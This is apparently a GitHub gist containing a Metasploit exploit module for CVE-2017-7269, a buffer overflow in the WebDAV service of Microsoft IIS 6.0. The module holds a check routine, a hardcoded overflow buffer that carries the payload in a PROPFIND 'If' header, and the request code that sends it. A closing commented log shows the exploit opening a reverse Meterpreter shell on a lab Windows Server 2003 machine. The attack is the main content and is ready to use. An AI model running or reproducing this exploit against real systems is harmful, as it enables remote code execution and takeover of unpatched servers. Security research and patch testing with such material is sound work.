Created
March 29, 2017 20:42
-
-
Save espreto/5ac4d123a227d018f6979bb4f7e43a25 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## | |
| # This module requires Metasploit: http://metasploit.com/download | |
| # Current source: https://github.com/rapid7/metasploit-framework | |
| ## | |
| require 'msf/core' | |
| class MetasploitModule < Msf::Exploit::Remote | |
| Rank = GoodRanking | |
| include Msf::Exploit::Remote::HttpClient | |
| def initialize(info = {}) | |
| super(update_info(info, | |
| 'Name' => 'Microsoft IIS WebDav ScStoragePathFromUrl Overflow', | |
| 'Description' => %q{ | |
| Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service | |
| in Internet Information Services (IIS) 6.0 in Microsoft Windows Server | |
| 2003 R2 allows remote attackers to execute arbitrary code via a long header | |
| beginning with "If: <http://" in a PROPFIND request, as exploited in the | |
| wild in July or August 2016. | |
| }, | |
| 'Author' => [ | |
| 'Zhiniang Peng', # Original author | |
| 'Chen Wu', # Original author | |
| 'Dominic Chell <dominic[at]mdsec.co.uk>', # Metasploit Module | |
| 'espreto <robertoespreto[at]gmail.com>' # Metasploit fixups | |
| ], | |
| 'License' => MSF_LICENSE, | |
| 'References' => [ | |
| ['CVE', '2017-7269'], | |
| ['BID', '97127'], | |
| ['URL', 'https://github.com/edwardz246003/IIS_exploit'] | |
| ], | |
| 'Privileged' => false, | |
| 'Payload' => { | |
| 'Space' => 2000, | |
| 'BadChars' => "\x00", | |
| 'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed, | |
| 'DisableNops' => 'True', | |
| 'EncoderOptions' => { | |
| 'BufferRegister' => 'ESI' | |
| }, | |
| }, | |
| 'DefaultOptions' => { | |
| 'EXITFUNC' => 'process', | |
| 'PrependMigrate' => true | |
| }, | |
| 'Targets' => [ | |
| [ | |
| 'Microsoft Windows Server 2003 R2 SP2', { | |
| 'Platform' => 'win' | |
| }, | |
| ], | |
| ], | |
| 'Platform' => 'win', | |
| 'DisclosureDate' => 'Mar 26 2017', | |
| 'DefaultTarget' => 0 | |
| )) | |
| register_options([ | |
| Opt::RPORT(80), | |
| OptString.new('VHOST', [ true, 'The virtual host name to use in requests', 'localhost']), | |
| ], self.class) | |
| end | |
| def check | |
| res = send_request_cgi( | |
| 'method' => 'OPTIONS', | |
| 'uri' => normalize_uri(target_uri.path) | |
| ) | |
| if res && res.headers['Server'].include?('IIS/6.0') && | |
| res.headers['MS-Author-Via'].include?('DAV') && | |
| res.headers['Allow'].include?('PROPFIND') | |
| return Exploit::CheckCode::Appears | |
| end | |
| Exploit::CheckCode::Safe | |
| end | |
| def random_uri | |
| Rex::Text.rand_text_alpha_lower(7) | |
| end | |
| def exploit | |
| begin | |
| buf = "<http://localhost/#{random_uri}" | |
| buf += "\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4" | |
| buf += "\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd\xb0\xe7\x95\x93\xe7\xa9" | |
| buf += "\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\xa5\x93" | |
| buf += "\xe5\x81\xac\xe5\x95\xa7\xe6\x9d\xa3\xe3\x8d\xa4\xe4\x98\xb0\xe7" | |
| buf += "\xa1\x85\xe6\xa5\x92\xe5\x90\xb1\xe4\xb1\x98\xe6\xa9\x91\xe7\x89" | |
| buf += "\x81\xe4\x88\xb1\xe7\x80\xb5\xe5\xa1\x90\xe3\x99\xa4\xe6\xb1\x87" | |
| buf += "\xe3\x94\xb9\xe5\x91\xaa\xe5\x80\xb4\xe5\x91\x83\xe7\x9d\x92\xe5" | |
| buf += "\x81\xa1\xe3\x88\xb2\xe6\xb5\x8b\xe6\xb0\xb4\xe3\x89\x87\xe6\x89" | |
| buf += "\x81\xe3\x9d\x8d\xe5\x85\xa1\xe5\xa1\xa2\xe4\x9d\xb3\xe5\x89\x90" | |
| buf += "\xe3\x99\xb0\xe7\x95\x84\xe6\xa1\xaa\xe3\x8d\xb4\xe4\xb9\x8a\xe7" | |
| buf += "\xa1\xab\xe4\xa5\xb6\xe4\xb9\xb3\xe4\xb1\xaa\xe5\x9d\xba\xe6\xbd" | |
| buf += "\xb1\xe5\xa1\x8a\xe3\x88\xb0\xe3\x9d\xae\xe4\xad\x89\xe5\x89\x8d" | |
| buf += "\xe4\xa1\xa3\xe6\xbd\x8c\xe7\x95\x96\xe7\x95\xb5\xe6\x99\xaf\xe7" | |
| buf += "\x99\xa8\xe4\x91\x8d\xe5\x81\xb0\xe7\xa8\xb6\xe6\x89\x8b\xe6\x95" | |
| buf += "\x97\xe7\x95\x90\xe6\xa9\xb2\xe7\xa9\xab\xe7\x9d\xa2\xe7\x99\x98" | |
| buf += "\xe6\x89\x88\xe6\x94\xb1\xe3\x81\x94\xe6\xb1\xb9\xe5\x81\x8a\xe5" | |
| buf += "\x91\xa2\xe5\x80\xb3\xe3\x95\xb7\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c" | |
| buf += "\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6\x95\x83" | |
| buf += "\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5" | |
| buf += "\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88\xc8\x82\xc8\x82\xe1\x8b\x80\xe6" | |
| buf += "\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd" | |
| buf += "\x98\xe5\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92" | |
| buf += "\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83\xe4\xa0\xb4\xe6" | |
| buf += "\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f" | |
| buf += "\x80\xe6\xa0\x83\xe5\x8d\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0" | |
| buf += "\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7" | |
| buf += "\xa5\x81\xe7\xa9\x90\xe4\xa9\xac" | |
| buf += ">" | |
| buf += "(Not <locktoken:write1>) <http://localhost/#{random_uri}" | |
| buf += "\xe7\xa5\x88\xe6\x85\xb5\xe4\xbd\x83\xe6\xbd\xa7\xe6\xad\xaf\xe4" | |
| buf += "\xa1\x85\xe3\x99\x86\xe6\x9d\xb5\xe4\x90\xb3\xe3\xa1\xb1\xe5\x9d" | |
| buf += "\xa5\xe5\xa9\xa2\xe5\x90\xb5\xe5\x99\xa1\xe6\xa5\x92\xe6\xa9\x93" | |
| buf += "\xe5\x85\x97\xe3\xa1\x8e\xe5\xa5\x88\xe6\x8d\x95\xe4\xa5\xb1\xe4" | |
| buf += "\x8d\xa4\xe6\x91\xb2\xe3\x91\xa8\xe4\x9d\x98\xe7\x85\xb9\xe3\x8d" | |
| buf += "\xab\xe6\xad\x95\xe6\xb5\x88\xe5\x81\x8f\xe7\xa9\x86\xe3\x91\xb1" | |
| buf += "\xe6\xbd\x94\xe7\x91\x83\xe5\xa5\x96\xe6\xbd\xaf\xe7\x8d\x81\xe3" | |
| buf += "\x91\x97\xe6\x85\xa8\xe7\xa9\xb2\xe3\x9d\x85\xe4\xb5\x89\xe5\x9d" | |
| buf += "\x8e\xe5\x91\x88\xe4\xb0\xb8\xe3\x99\xba\xe3\x95\xb2\xe6\x89\xa6" | |
| buf += "\xe6\xb9\x83\xe4\xa1\xad\xe3\x95\x88\xe6\x85\xb7\xe4\xb5\x9a\xe6" | |
| buf += "\x85\xb4\xe4\x84\xb3\xe4\x8d\xa5\xe5\x89\xb2\xe6\xb5\xa9\xe3\x99" | |
| buf += "\xb1\xe4\xb9\xa4\xe6\xb8\xb9\xe6\x8d\x93\xe6\xad\xa4\xe5\x85\x86" | |
| buf += "\xe4\xbc\xb0\xe7\xa1\xaf\xe7\x89\x93\xe6\x9d\x90\xe4\x95\x93\xe7" | |
| buf += "\xa9\xa3\xe7\x84\xb9\xe4\xbd\x93\xe4\x91\x96\xe6\xbc\xb6\xe7\x8d" | |
| buf += "\xb9\xe6\xa1\xb7\xe7\xa9\x96\xe6\x85\x8a\xe3\xa5\x85\xe3\x98\xb9" | |
| buf += "\xe6\xb0\xb9\xe4\x94\xb1\xe3\x91\xb2\xe5\x8d\xa5\xe5\xa1\x8a\xe4" | |
| buf += "\x91\x8e\xe7\xa9\x84\xe6\xb0\xb5\xe5\xa9\x96\xe6\x89\x81\xe6\xb9" | |
| buf += "\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5" | |
| buf += "\xe5\xa5\x81\xe7\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5" | |
| buf += "\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6\xb9" | |
| buf += "\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83" | |
| buf += "\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5\x88\xb4\xe4\xad\xa6\xe4" | |
| buf += "\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84" | |
| buf += "\xb5\xe7\x89\xba\xe7\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97" | |
| buf += "\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6" | |
| buf += "\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf" | |
| buf += "\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae\xe6\xa0\x83\xe7\x85" | |
| buf += "\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81" | |
| buf += "\xe9\x8e\x91\xe6\xa0\x80\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3" | |
| buf += "\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90" | |
| buf += "\x9c\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8" | |
| buf += "\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0\xe8\x89\x86\xe6" | |
| buf += "\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd" | |
| buf += "\xaa\xe4\x8c\xb5\xe1\x8f\xb8\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81" | |
| buf += payload.encoded | |
| buf += ">" | |
| send_request_raw( | |
| 'uri' => normalize_uri(target_uri.path), | |
| 'method' => 'PROPFIND', | |
| 'headers' => { | |
| 'Content-Length' => 0, | |
| 'If' => buf | |
| } | |
| ) | |
| rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, | |
| ::Rex::ConnectionTimeout => e | |
| fail_with(Failure::NoTarget, "#{e.message}") | |
| end | |
| end | |
| end | |
| =begin | |
| gotham 192.168.1.39 shell[s]:0 job[s]:0 msf > use exploit/windows/iis/iis_webdav_scstoragepathfromurl | |
| gotham 192.168.1.39 shell[s]:0 job[s]:0 msf exploit(iis_webdav_scstoragepathfromurl) > set RHOST 192.168.1.38 | |
| RHOST => 192.168.1.38 | |
| gotham 192.168.1.39 shell[s]:0 job[s]:0 msf exploit(iis_webdav_scstoragepathfromurl) > exploit | |
| [*] Started reverse TCP handler on 192.168.1.39:4444 | |
| [*] Sending stage (957487 bytes) to 192.168.1.38 | |
| [*] Meterpreter session 1 opened (192.168.1.39:4444 -> 192.168.1.38:1027) at 2017-03-29 17:38:23 -0300 | |
| meterpreter > sysinfo | |
| Computer : WINDOWS_MSF_LAB | |
| OS : Windows .NET Server (Build 3790, Service Pack 2). | |
| Architecture : x86 | |
| System Language : pt_BR | |
| Domain : GRUPO | |
| Logged On Users : 2 | |
| Meterpreter : x86/windows | |
| meterpreter > background | |
| [*] Backgrounding session 1... | |
| gotham 192.168.1.39 shell[s]:1 job[s]:0 msf exploit(iis_webdav_scstoragepathfromurl) > | |
| =end |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment